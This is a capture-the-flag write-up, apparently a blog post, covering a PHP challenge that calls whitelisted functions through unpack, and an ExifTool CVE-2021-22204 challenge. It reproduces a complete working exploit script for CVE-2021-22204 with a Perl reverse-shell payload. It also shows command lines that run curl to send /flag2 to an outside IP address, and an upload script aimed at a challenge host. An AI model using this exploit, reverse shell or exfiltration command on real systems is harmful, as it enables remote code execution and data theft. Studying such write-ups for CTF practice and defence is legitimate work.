2022 Chunqiu Cup Cybersecurity League Spring Round: Brave Peak (勇者山峰)

2023-05-17 10:30:15 Views (1)

easy_php

Challenge description: pwner: I've decided to start grinding web. How should I learn it? Never mind, let's start with basic PHP.

index.php

<?php
highlight_file(__FILE__);
error_reporting(0);
function createFolder($path)
{
    if (!file_exists($path)) {
        createFolder(dirname($path));
        mkdir($path, 0777);
    }
}

function savePostData()
{
    $content = $GLOBALS['HTTP_RAW_POST_DATA'];
    if (empty($content)) {
        $content = file_get_contents('php://input');
    }
    if ($content == null) {
        exit(0);
    }
    // First pass: six 32-bit little-endian ints; the last two give the lengths of the two trailing fields.
    $format = 'lnDataLen/lnHeadLen/lnPackTotal/lnPackNum/lnFileNameLen/lnFileDataLen';
    $head = unpack("$format", $content);
    unset($format);
    // Second pass: same header plus the function name and its argument, sized from the header.
    $format = 'lnDataLen/lnHeadLen/lnPackTotal/lnPackNum/lnFileNameLen/lnFileDataLen' . '/a' . ($head["nFileNameLen"]) . 'chFileName' . '/a' . ($head["nFileDataLen"]) . 'data';
    $head = unpack("$format", $content);
    if (is_string($head["chFileName"])) {
        $fileName = $head["chFileName"];
        $white_func = array("readfile", "unserialize", "phpinfo");
        if (!in_array($fileName, $white_func)) {
            exit("hi hack!");
        }
        // The whitelisted name is called as a variable function with the data field as its argument.
        $fileName($head["data"]);
    }
    echo "FAIL";
}
savePostData();
?>

From this we get the way to construct matching unpack data:

<?php
function savePostData($fn, $data)
{
    $datalen = strlen($data);
    $fnlen = strlen($fn);
    // pack() mirror of the server's format: six ints, then the name and data as fixed-length strings
    $content = pack("l6a" . $fnlen . "a" . $datalen, 1, 2, 3, 4, $fnlen, $datalen, $fn, $data);
    var_dump(urlencode($content), strlen($content));
}
$white_func = array("readfile", "unserialize", "phpinfo");
savePostData($white_func[2], '99999');

Insert the resulting bytes one by one in Burp's hex view.

Strangely, readfile outputs the file fine when I test it locally, but in the challenge environment readfile could not read the file; not sure what the problem is...
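As an added example (not from the writeup), the same wire format in Python: build_packet mirrors the PHP solver above, and parse_packet reproduces the server's two-stage unpack plus the whitelist gate, so the 24-byte header and its two length fields can be inspected directly. The helper names and the latin-1 decoding are my own choices.

```python
import struct

# The whitelist hard-coded in the challenge's index.php.
WHITE_FUNC = ("readfile", "unserialize", "phpinfo")

# PHP's 'l' is a 32-bit signed int in machine byte order (little-endian on x86),
# so the six named header fields map to struct format '<6i' (24 bytes).
HEAD_FMT = "<6i"
HEAD_LEN = struct.calcsize(HEAD_FMT)


def build_packet(fn: str, data: bytes) -> bytes:
    """Python twin of the writeup's pack("l6a..a..") solver: 6 ints, name, data."""
    fn_b = fn.encode()
    return struct.pack(HEAD_FMT, 1, 2, 3, 4, len(fn_b), len(data)) + fn_b + data


def parse_packet(content: bytes):
    """Re-implements the server's two-stage unpack.

    Returns (fn, data), or None where PHP's unpack would fail and the page
    would print "FAIL": header too short, or body shorter than the lengths
    the header itself declares.
    """
    if len(content) < HEAD_LEN:
        return None
    # Field order follows the format string:
    # nDataLen/nHeadLen/nPackTotal/nPackNum/nFileNameLen/nFileDataLen
    _, _, _, _, fn_len, data_len = struct.unpack_from(HEAD_FMT, content)
    if fn_len < 0 or data_len < 0:
        return None
    body_fmt = f"<6i{fn_len}s{data_len}s"
    if len(content) < struct.calcsize(body_fmt):
        return None
    *_, fn_b, data = struct.unpack_from(body_fmt, content)
    return fn_b.decode("latin-1"), data


def is_allowed(fn: str) -> bool:
    """The in_array($fileName, $white_func) gate; anything else gets 'hi hack!'."""
    return fn in WHITE_FUNC
```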
bash CVE-2021-22204.sh "system('ls -al /> /tmp/1')" poc2.jpg && python3 1.py

bash CVE-2021-22204.sh "system('curl -F \"file=@/flag2\" 47.99.70.18:4444')" poc2.jpg && python3 1.py

A Python challenge (I don't remember its name)

I only got the half of the flag from the exif vulnerability (/flag1); the other half, from the convert vulnerability, I didn't solve. I downloaded many POCs online and none of them worked (the same was true for the exif vulnerability, until I finally found the working script below):

#!/bin/bash

RS='\033[0m'
R='\033[0;31m'
G='\033[0;32m'
LB='\033[1;34m'
CY='\033[0;36m'
W='\033[1;73m'

art=$(base64 -d <<< "H4sIAFNGCWEA/52OMRLEIAwD+7xiy1Dxm6s8w0f8+KxyUFx7eGQhodgBVs4viy8ptz5Qx75gqoqSc2sLBtRLHcfLgX6TusTtmOLDbEytlQn3yCATW5/Sz6DVbizf2j7fVDPteiHX+0f5diM+5rLxz/MATvFQnxwBAAA=" | gunzip)
printf "${G}${art}${RS}"

# Check for params
if [ ${#@} -lt 2 ]; then
    echo -e "\nUsage: ./CVE-2021-22204 cmd image.jpg"
    echo -e "Eg: ./CVE-2021-22204 \"system('id')\" kitten.jpg"
    echo -e "Reverseshell: ./CVE-2021-22204 \"reverseme IP PORT\" image.jpg"
    exit
fi

# Check djvulibre is installed.
if [ $(dpkg-query -W -f='${Status}' "djvulibre-bin" 2>/dev/null | grep -c "ok installed") -eq 0 ]; then
    echo -e -n "\n${R}Warning:${RS} djvulibre-bin is not installed.\n"
    echo -e "${G}Confirm: ${RS}"
    read -p "Install djvulibre-bin now? (y/n):" confirm
    if [[ ${confirm} =~ ^([yY][eE][sS]|[yY])$ ]]; then
        sudo apt-get install djvulibre-bin -y
    else
        exit
    fi
fi

# Create payload
echo -e "\nCreating payload"

cmd="$1"

if [[ "${cmd:0:9}" = "reverseme" ]]; then
        ip=$(echo "$cmd" | cut -d" " -f 2)
        port=$(echo "$cmd" | cut -d" " -f 3)
        echo "IP: $ip"
        echo "PORT: $port"
cat <<EOF> payload
(metadata "\c\${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($port,inet_aton('$ip')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};};")
EOF

else
cat <<EOF> payload
(metadata "\c\${$1};")
EOF
fi

cat payload
echo -e "\n"

# Compress payload
bzz payload payload.bzz

# INFO = Anything in the format 'N,N' where N is a number
# BGjp = Expects a JPEG image, but we can use /dev/null to use nothing as background image
# ANTz = Will write the compressed annotation chunk with the input file
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz

cat <<EOF> configfile
%Image::ExifTool::UserDefined = (
    # All EXIF tags are added to the Main table, and WriteGroup is used to
    # specify where the tag is written (default is ExifIFD if not specified):
    'Image::ExifTool::Exif::Main' => {
        # Example 1.  EXIF:NewEXIFTag
        0xc51b => {
            Name => 'HasselbladExif',
            Writable => 'string',
            WriteGroup => 'IFD0',
        },
        # add more user-defined EXIF tags here...
    },
);
1; #end
EOF

exiftool -config configfile '-HasselbladExif<=exploit.djvu' "$2"
rm configfile payload.bzz payload exploit.djvu

echo -e -n "\n${G}Finished${RS}"

The PoC that got the first half of the flag:

import os, sys
import requests

url = "http://eci-2ze4iv6httpb9dlwbvru.cloudeci1.ichunqiu.com:8888"
session = requests.session()
# cmd = sys.argv[1]
# os.system(f"bash CVE-2021-22204.sh \"{cmd}\" poc2.jpg")
file = open("poc2.jpg", "rb").read()
files = [
    ('file', ('curl4444.jpg', file, 'image/jpeg')),
]
# Upload the crafted image, then trigger the metadata read and the convert step
print(session.post(url + "/upload", files=files).text)
print(session.get(url + "/info").text)
print(session.get(url + "/convert").text.split('"')[-2])
